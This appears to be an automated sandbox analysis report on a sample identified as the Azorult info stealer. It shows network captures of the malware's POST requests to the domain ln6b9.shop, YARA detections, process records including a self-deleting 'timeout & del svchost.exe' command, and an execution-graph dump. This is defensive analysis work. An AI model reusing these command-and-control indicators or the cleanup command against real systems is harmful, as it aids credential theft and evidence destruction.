                                  Aug 29, 2024 23:42:09.620974064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620991945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621002913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621015072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621018887 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621026039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621036053 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621041059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621064901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621099949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621112108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621120930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621134043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621145010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621146917 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621156931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621161938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621170044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621185064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621186972 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621200085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621211052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621211052 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621222973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621228933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621251106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621260881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621273041 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621292114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621303082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621309042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621331930 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621349096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621381998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621392965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621411085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621422052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621427059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621433973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621445894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621452093 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621473074 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621479034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621490002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621495962 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621500015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621510029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621522903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621546984 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621572971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621584892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621593952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621608019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621619940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621645927 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621668100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621680021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621690035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621701002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621715069 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621736050 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621750116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702131033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702172041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702181101 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702233076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702244043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702253103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702263117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702271938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702327967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702341080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702346087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702352047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702352047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702352047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702387094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702403069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702415943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702425957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702454090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702466965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702491045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702502012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702539921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.703006029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703057051 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.703072071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703082085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703088045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703099012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703111887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703129053 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.703155041 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.703155041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703167915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703206062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706165075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706185102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706195116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706213951 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706245899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706269026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706279993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706290960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706302881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706319094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706345081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706397057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706408978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706419945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706432104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706442118 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706470013 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706501007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706512928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706528902 CEST8049730172.67.128.117192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 29, 2024 23:42:04.256408930 CEST | 49405 | 53 | 192.168.2.4 | 1.1.1.1
Aug 29, 2024 23:42:04.268414974 CEST | 53 | 49405 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 29, 2024 23:42:04.256408930 CEST | 192.168.2.4 | 1.1.1.1 | 0xbfb8 | Standard query (0) | ln6b9.shop | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 29, 2024 23:42:04.268414974 CEST | 1.1.1.1 | 192.168.2.4 | 0xbfb8 | No error (0) | ln6b9.shop |  | 172.67.128.117 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 23:42:04.268414974 CEST | 1.1.1.1 | 192.168.2.4 | 0xbfb8 | No error (0) | ln6b9.shop |  | 104.21.2.6 | A (IP address) | IN (0x0001) | false
                                  • ln6b9.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.128.117 | 80 | 4940 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Aug 29, 2024 23:42:04.280487061 CEST | 268 | OUT | POST /LN341/index.php HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                  Host: ln6b9.shop
                                  Content-Length: 105
                                  Cache-Control: no-cache
                                  Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 65 8b 30 64 8b 30 6d eb 47 16 ed 26 66 97 26 67 ea 40 70 9d 30 70 9d 37 14 8b 30 61 e8 26 66 9e 26 66 97
                                  Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10e0d0mG&f&g@p0p70a&f&f
Aug 29, 2024 23:42:06.009866953 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 21:42:05 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/5.6.37
                                  Vary: Accept-Encoding,User-Agent
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6VsGI8ptrUBTu4hOUWpoyKktshWAvYcQ44E5J5UW6WB7BvD10wf0jA0%2FxQvm%2BQIzQ%2FbGuGXR2VVFtramH3PDGem5AQXewUEW78DN2qNtGsGpKn0jQNN5AB%2BVbjKh"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8bafb577aab919ef-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Ascii: Mv{I]a@;K]r7J_w@{Cd\;pgRnMc5{d V!4dd]D8D#HBqGz[-A I(BqGB,Gdu`f5\M`d75]L-)<=3WddwbP{2H<SuHHi`%1(FvR
                                  Aug 29, 2024 23:42:06.009979963 CEST1236INData Raw: f9 9e cf 9d 41 ab 43 d5 55 f2 56 b5 43 9c 8d 85 be cd a3 99 35 ed dd a4 db 3d d0 e3 21 20 bc ea 54 bb 6b 16 c8 d2 62 cc 9d a5 df 3b f8 e1 1b 08 f8 c2 e9 14 02 d3 76 4d aa 6e a7 59 0a 8a 3a e0 a7 f4 e5 8b ad f1 78 54 0a 60 92 2c 09 9b 2d 89 be 00
                                  Data Ascii: ACUVC5=! Tkb;vMnY:xT`,-@#$I(G!48K2,@+OP7$R0{L*0_RYOe X7vdyBI2h6dwg_Voc4`euVted5DlZ`e0
                                  Aug 29, 2024 23:42:06.014911890 CEST1236INData Raw: 92 a2 ca 31 9f 07 9d c8 b1 55 69 66 55 2d ca 3a 9c 80 9c ca 33 ed 95 70 f4 fe 30 a3 f1 b5 24 66 d8 3c cc 38 fe 28 0e 20 be 74 56 27 e7 9c fa 8c 10 c7 62 6a 1f 37 d2 45 12 bd 74 5c e5 26 56 5f 97 f8 e4 f4 51 eb a1 df 65 d6 ca 43 b1 08 6e ac 0a bc
                                  Data Ascii: 1UifU-:3p0$f<8( tV'bj7Et\&V_QeCn0ji^KNW.hml/?>tDLFaGOb}1lan(Qf3Y?P;F<#78{b_*"sH`?="h-UDK&X}^}i


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  1 | 192.168.2.4 | 49731 | 172.67.128.117 | 80 | 4940 | C:\Windows\SysWOW64\svchost.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Aug 29, 2024 23:42:10.314457893 CEST | 165 | OUT | POST /LN341/index.php HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                  Host: ln6b9.shop
                                  Content-Length: 32713
                                  Cache-Control: no-cache
                                  Aug 29, 2024 23:42:14.381748915 CEST | 629 | IN | HTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 21:42:14 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/5.6.37
                                  Vary: User-Agent
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CKHFkk3fyb%2BN0CrLosKjkX%2B0LSlqRj7Ht5Lv38bad8NQBjVfrcVo3NetJzN%2FQqbRbK%2Fvb%2BJkpAt5TjApb7NMENp9LAlHCA7hSX4xpDWujyubXcp5hd6gTsY5ac9c"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8bafb59cfa924372-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: 7falseOK0



                                  Target ID:0
                                  Start time:17:41:57
                                  Start date:29/08/2024
                                  Path:C:\Users\user\Desktop\cJX8BV8LYG.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\cJX8BV8LYG.exe"
                                  Imagebase:0x780000
                                  File size:1'320'960 bytes
                                  MD5 hash:528D3EF48415F22BD277A9759D83A859
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:17:42:03
                                  Start date:29/08/2024
                                  Path:C:\Windows\SysWOW64\svchost.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\cJX8BV8LYG.exe"
                                  Imagebase:0xe40000
                                  File size:46'504 bytes
                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.1816856617.0000000006C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:17:42:14
                                  Start date:29/08/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:17:42:14
                                  Start date:29/08/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:17:42:14
                                  Start date:29/08/2024
                                  Path:C:\Windows\SysWOW64\timeout.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\system32\timeout.exe 3
                                  Imagebase:0x2b0000
                                  File size:25'088 bytes
                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:3.3%
                                    Dynamic/Decrypted Code Coverage:1.3%
                                    Signature Coverage:2.9%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:62
95768->95932 95770 79152f 95771 79153c 95770->95771 95772 7d63d1 95770->95772 95773 791940 9 API calls 95771->95773 95934 805745 54 API calls _wcslen 95772->95934 95775 791549 95773->95775 95779 7d64fa 95775->95779 95781 791940 9 API calls 95775->95781 95776 79fddb 22 API calls 95776->95784 95777 791872 95929 79faeb 23 API calls 95777->95929 95778 79fe0b 22 API calls 95778->95784 95788 7d6369 95779->95788 95935 7f359c 82 API calls __wsopen_s 95779->95935 95786 791563 95781->95786 95783 78ec40 235 API calls 95783->95784 95784->95764 95784->95768 95784->95770 95784->95776 95784->95778 95784->95783 95785 7d63b2 95784->95785 95784->95788 95933 7f359c 82 API calls __wsopen_s 95785->95933 95786->95779 95789 78a8c7 22 API calls 95786->95789 95791 7915c7 ISource 95786->95791 95788->95738 95789->95791 95790 791940 9 API calls 95790->95791 95791->95777 95791->95779 95791->95788 95791->95790 95793 79167b ISource 95791->95793 95820 80958b 95791->95820 95823 7ed4ce 95791->95823 95826 7ff0ec 95791->95826 95835 784f39 95791->95835 95841 7f6ef1 95791->95841 95921 80959f 95791->95921 95792 79171d 95792->95738 95793->95792 95924 79ce17 22 API calls ISource 95793->95924 95801->95738 95802->95738 95803->95713 95804->95718 95805->95732 95806->95732 95807->95732 95808->95721 95809->95732 95811 791981 95810->95811 95819 79195d 95810->95819 95936 7a0242 5 API calls __Init_thread_wait 95811->95936 95812 7913a0 95812->95756 95814 79198b 95814->95819 95937 7a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95814->95937 95816 798727 95816->95812 95939 7a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95816->95939 95819->95812 95938 7a0242 5 API calls __Init_thread_wait 95819->95938 95940 807f59 95820->95940 95822 80959b 95822->95791 96104 7edbbe lstrlenW 95823->96104 95827 787510 53 API calls 95826->95827 95828 7ff126 95827->95828 96109 789e90 95828->96109 95830 7ff136 95831 7ff15b 95830->95831 95832 78ec40 235 API calls 95830->95832 95834 7ff15f 
95831->95834 96137 789c6e 22 API calls 95831->96137 95832->95831 95834->95791 95836 784f4a 95835->95836 95837 784f43 95835->95837 95839 784f59 95836->95839 95840 784f6a FreeLibrary 95836->95840 96158 7ae678 95837->96158 95839->95791 95840->95839 95842 78a961 22 API calls 95841->95842 95843 7f6f1d 95842->95843 95844 78a961 22 API calls 95843->95844 95845 7f6f26 95844->95845 95846 7f6f3a 95845->95846 96572 78b567 39 API calls 95845->96572 95848 787510 53 API calls 95846->95848 95849 7f6f57 _wcslen 95848->95849 95850 7f70bf 95849->95850 95851 7f6fbc 95849->95851 95859 7f70e9 95849->95859 96387 784ecb 95850->96387 95852 787510 53 API calls 95851->95852 95854 7f6fc8 95852->95854 95857 78a8c7 22 API calls 95854->95857 95861 7f6fdb 95854->95861 95856 78a961 22 API calls 95860 7f711a 95856->95860 95857->95861 95858 784ecb 94 API calls 95862 7f70e5 95858->95862 95859->95791 95863 78a961 22 API calls 95860->95863 95864 7f7027 95861->95864 95867 7f7005 95861->95867 95870 78a8c7 22 API calls 95861->95870 95862->95856 95862->95859 95866 7f7126 95863->95866 95865 787510 53 API calls 95864->95865 95868 7f7034 95865->95868 95869 78a961 22 API calls 95866->95869 95871 7833c6 22 API calls 95867->95871 95872 7f703d 95868->95872 95873 7f7047 95868->95873 95874 7f712f 95869->95874 95870->95867 95875 7f700f 95871->95875 95876 78a8c7 22 API calls 95872->95876 96573 7ee199 GetFileAttributesW 95873->96573 95878 78a961 22 API calls 95874->95878 95879 787510 53 API calls 95875->95879 95876->95873 95881 7f7138 95878->95881 95882 7f701b 95879->95882 95880 7f7050 95883 7f7063 95880->95883 95887 784c6d 22 API calls 95880->95887 95884 787510 53 API calls 95881->95884 95885 786350 22 API calls 95882->95885 95886 787510 53 API calls 95883->95886 95893 7f7069 95883->95893 95888 7f7145 95884->95888 95885->95864 95889 7f70a0 95886->95889 95887->95883 96409 78525f 95888->96409 96574 7ed076 57 API calls 95889->96574 95892 7f7166 96451 784c6d 95892->96451 95893->95859 95896 7f71a9 95898 78a8c7 22 API 
calls 95896->95898 95897 784c6d 22 API calls 95899 7f7186 95897->95899 95900 7f71ba 95898->95900 95899->95896 95902 786b57 22 API calls 95899->95902 96454 786350 95900->96454 95904 7f719b 95902->95904 95906 786b57 22 API calls 95904->95906 95905 786350 22 API calls 95907 7f71d6 95905->95907 95906->95896 95908 786350 22 API calls 95907->95908 95909 7f71e4 95908->95909 95910 787510 53 API calls 95909->95910 95911 7f71f0 95910->95911 96463 7ed7bc 95911->96463 95913 7f7201 95914 7ed4ce 4 API calls 95913->95914 95915 7f720b 95914->95915 95916 787510 53 API calls 95915->95916 95920 7f7239 95915->95920 95917 7f7229 95916->95917 96517 7f2947 95917->96517 95919 784f39 68 API calls 95919->95859 95920->95919 95922 807f59 120 API calls 95921->95922 95923 8095af 95922->95923 95923->95791 95924->95793 95925->95752 95926->95755 95927->95764 95928->95777 95929->95777 95930->95754 95931->95788 95932->95788 95933->95788 95934->95786 95935->95788 95936->95814 95937->95819 95938->95816 95939->95812 95978 787510 95940->95978 95944 808281 95945 80844f 95944->95945 95949 80828f 95944->95949 96060 808ee4 60 API calls 95945->96060 95948 80845e 95948->95949 95950 80846a 95948->95950 96014 807e86 95949->96014 95966 807fd5 ISource 95950->95966 95951 787510 53 API calls 95968 808049 95951->95968 95956 8082c8 96029 79fc70 95956->96029 95959 808302 96033 7863eb 95959->96033 95960 8082e8 96057 7f359c 82 API calls __wsopen_s 95960->96057 95963 8082f3 GetCurrentProcess TerminateProcess 95963->95959 95966->95822 95968->95944 95968->95951 95968->95966 96055 7e417d 22 API calls __fread_nolock 95968->96055 96056 80851d 42 API calls _strftime 95968->96056 95970 8084c5 95970->95966 95972 8084d9 FreeLibrary 95970->95972 95971 808341 96058 808b7b 75 API calls 95971->96058 95972->95966 95974 7904f0 22 API calls 95977 808352 95974->95977 95977->95970 95977->95974 96059 78aceb 23 API calls ISource 95977->96059 96061 808b7b 75 API calls 95977->96061 95979 787525 95978->95979 95995 787522 95978->95995 95980 
78755b 95979->95980 95981 78752d 95979->95981 95983 7c50f6 95980->95983 95986 7c500f 95980->95986 95987 78756d 95980->95987 96062 7a51c6 26 API calls 95981->96062 96065 7a5183 26 API calls 95983->96065 95984 78753d 95991 79fddb 22 API calls 95984->95991 95994 79fe0b 22 API calls 95986->95994 96000 7c5088 95986->96000 96063 79fb21 51 API calls 95987->96063 95989 7c510e 95989->95989 95992 787547 95991->95992 95993 789cb3 22 API calls 95992->95993 95993->95995 95997 7c5058 95994->95997 95995->95966 96001 808cd3 95995->96001 95996 79fddb 22 API calls 95998 7c507f 95996->95998 95997->95996 95999 789cb3 22 API calls 95998->95999 95999->96000 96064 79fb21 51 API calls 96000->96064 96002 78aec9 22 API calls 96001->96002 96003 808cee CharLowerBuffW 96002->96003 96066 7e8e54 96003->96066 96007 78a961 22 API calls 96008 808d2a 96007->96008 96073 786d25 96008->96073 96010 808d3e 96011 7893b2 22 API calls 96010->96011 96013 808d48 _wcslen 96011->96013 96012 808e5e _wcslen 96012->95968 96013->96012 96086 80851d 42 API calls _strftime 96013->96086 96015 807ea1 96014->96015 96019 807eec 96014->96019 96016 79fe0b 22 API calls 96015->96016 96017 807ec3 96016->96017 96018 79fddb 22 API calls 96017->96018 96017->96019 96018->96017 96020 809096 96019->96020 96021 8092ab ISource 96020->96021 96028 8090ba _strcat _wcslen 96020->96028 96021->95956 96022 78b38f 39 API calls 96022->96028 96023 78b567 39 API calls 96023->96028 96024 78b6b5 39 API calls 96024->96028 96025 787510 53 API calls 96025->96028 96026 7aea0c 21 API calls ___std_exception_copy 96026->96028 96028->96021 96028->96022 96028->96023 96028->96024 96028->96025 96028->96026 96090 7eefae 24 API calls _wcslen 96028->96090 96031 79fc85 96029->96031 96030 79fd1d VirtualAlloc 96032 79fceb 96030->96032 96031->96030 96031->96032 96032->95959 96032->95960 96034 7863f3 96033->96034 96035 79fddb 22 API calls 96034->96035 96036 786401 96035->96036 96091 786a26 96036->96091 96039 786a50 96094 78b010 96039->96094 96041 786a60 96042 79fe0b 
